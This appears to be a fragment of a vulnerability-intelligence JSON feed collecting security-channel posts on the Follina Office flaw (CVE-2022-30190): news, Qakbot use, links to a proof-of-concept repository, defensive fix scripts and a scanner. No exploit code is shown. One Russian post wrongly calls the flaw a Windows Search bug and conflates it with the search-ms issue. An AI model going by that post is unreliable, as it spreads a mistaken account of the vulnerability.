"vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6105", "content": "#Threat_Research\nNew Microsoft Office Attack Vector via \"ms-msdt\" Protocol Scheme (CVE-2022-30190)\nhttps://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme/28694\n]-> https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug\n]-> https://github.com/bytecaps/CVE-2022-30190", "creation_timestamp": "2022-06-01T02:13:30.000000Z"}, {"uuid": "c6a27db5-b108-4e76-a04c-b1674f5d7b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6184", "content": "#Whitepaper\n\"TA570 Qakbot (Qbot) tries CVE-2022-30190 (Follina) exploit\", 09.06.2022.", "creation_timestamp": "2022-06-12T13:31:01.000000Z"}, {"uuid": "507d1b06-35bf-4394-abd4-cd97ebc18495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6514", "content": "#Threat_Research\n1. LofyLife: malicious npm packages steal Discord tokens and bank card data\nhttps://securelist.com/lofylife-malicious-npm-packages/107014\n2. Follina exploit (CVE-2022-30190) fuels \"live-off-the-land\" attacks\nhttps://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", "creation_timestamp": "2022-08-02T11:49:18.000000Z"}, {"uuid": "43a4ea76-9dba-494a-ab7c-1ead3595d236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/7395", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n2. CVE-2021-44228: Apache Log4Shell\n3. CVE-2022-22965: Spring4Shell\n4. CVE-2022-1388: F5 BIG-IP\n5. CVE-2022-0609: Google Chrome 0-day\n6. CVE-2017-11882: MS Office RCE\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n9. CVE-2022-26134: Atlassian Confluence RCE\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2024-10-11T03:03:25.000000Z"}, {"uuid": "0002c1b2-11a5-43e9-9e53-5484fb4b9efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6212", "content": "#Blue_Team_Techniques\nThese are two Python scripts compiled to quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n]-> Source Codes:\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code", "creation_timestamp": "2022-06-16T10:59:01.000000Z"}, {"uuid": "c2a7aa9d-97c7-48ff-b81a-d5d2d3366971", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6797", "content": "#tools\n#Blue_Team_Techniques\n1. FollinaScanner - A tool that scans files & directories for the Follina exploit (CVE-2022-30190)\nhttps://github.com/ErrorNoInternet/FollinaScanner\n2. On Challenges in Verifying Trusted Executable Files in Memory Forensics (+ .pdf)\nhttps://www.sciencedirect.com/science/article/pii/S2666281720300123?via%3Dihub\n]-> Microsoft Authenticode:\nhttps://reversea.me/index.php/authenticode-i-understanding-windows-authenticode", "creation_timestamp": "2022-09-14T11:01:01.000000Z"}, {"uuid": "1177c63b-f347-4d0c-974d-20aa2221727b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/binary_xor/567", "content": "#news \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 Microsoft Office \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0451\u043d\u043d\u044b\u0445 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u0430\u044f Follina, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0434\u0442\u044f\u043d\u0443\u0442\u044c \u0437\u043b\u043e\u0432\u0440\u0435\u0434 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c Powershell-\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e MSDT \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u0430. \u0414\u043b\u044f \u044d\u0442\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u043d\u0435 \u043d\u0443\u0436\u043d\u044b \u043d\u0438 \u043c\u0430\u043a\u0440\u043e\u0441\u044b, \u043d\u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438. \u041d\u0435\u0442 \u0442\u043e\u043b\u043a\u0443 \u0438 \u043e\u0442 Windows Defender\u2019a. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, RTF-\u0444\u0430\u0439\u043b \u0434\u0430\u0436\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0435 \u043d\u0430\u0434\u043e: \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u0435\u0433\u043e, \u0435\u0441\u043b\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u0430\u043d\u0435\u043b\u044c \u043f\u0440\u0435\u0432\u044c\u044e. \u041f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 MS, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 2013.\n\n\u0421\u0430\u043c\u043e\u0435 \u0437\u0430\u043d\u044f\u0442\u043d\u043e\u0435, \u041c\u0435\u043b\u043a\u043e\u0441\u043e\u0444\u0442\u0443 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0435\u0449\u0451 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435, \u043d\u043e \u0442\u0438\u043a\u0435\u0442 \u0437\u0430\u043a\u0440\u044b\u043b\u0438, \u0442\u0430\u043a \u043a\u0430\u043a \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u0435\u0451 \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0430. \u041d\u0443, \u0437\u0430\u0442\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u0441\u043c\u043e\u0433\u0443\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438. \u0417\u0430\u043f\u043e\u0437\u0434\u0430\u043b\u044b\u0439 \u043f\u0430\u0442\u0447 \u0443\u0436\u0435 \u043e\u0431\u0435\u0449\u0430\u043d, \u0430 \u043f\u043e\u043a\u0430 \u0432\u043e\u0440\u0434\u043e\u0432\u0441\u043a\u0438\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u043f\u043e\u0447\u0442\u0435 \u0434\u0430\u0436\u0435 \u043a\u0443\u0440\u0441\u043e\u0440\u043e\u043c \u0433\u043b\u0430\u0434\u0438\u0442\u044c \u043d\u0435 \u0441\u0442\u043e\u0438\u0442.\n\n@tomhunter", "creation_timestamp": "2023-02-08T23:37:32.000000Z"}, {"uuid": "6c49f5db-3505-42b2-a201-71cd75c63127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/LearnExploit/4351", "content": "1. Follina (CVE-2022-30190)\n\n2. Log4Shell (CVE-2021-44228)\n\n3. Spring4Shell (CVE-2022-22965)\n\n4. F5 BIG-IP (CVE-2022-1388)\n\n5. Google Chrome zero-day (CVE-2022-0609)\n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n#Exploit \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:38.000000Z"}, {"uuid": "cdcd5fa3-2484-4e25-8e84-0385e7a509c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/onfpowernemesis/3211", "content": "\u041d\u0435\u043c\u0435Z\u0438\u0434\u0430 (Telegram)\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb (Windows Search) \u2014 CVE-2022-30190. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043e\u043a\u043d\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0435\u0441\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c. \u0410 \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \u043e\u043a\u043d\u043e, \u0436\u0435\u0440\u0442\u0432\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 Microsoft \u2014 MSDT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u044b. \u041d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0434\u0441\u0443\u043d\u0443\u0442\u044c \u0435\u043c\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office, \u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0441\u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URI-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00absearch-ms\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c \u0438 HTML-\u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0422\u0430\u043a\u0438\u0435 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043d\u043e \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c?\n\n\u0425\u0430\u043a\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office \u0438 \u043a\u0430\u043a-\u0442\u043e \u0435\u0433\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0441\u0430\u0439\u0442\u044b,...\n\n\u041f\u0435\u0440\u0435\u0439\u0442\u0438 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u0441\u0442", "creation_timestamp": "2025-01-14T13:35:58.000000Z"}, {"uuid": "d5fb0037-5a4c-426c-8388-94941dd62bba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/401a026b524772fda41c0ecb57d92a4c", "content": "", "creation_timestamp": "2026-05-04T17:03:16.000000Z"}]}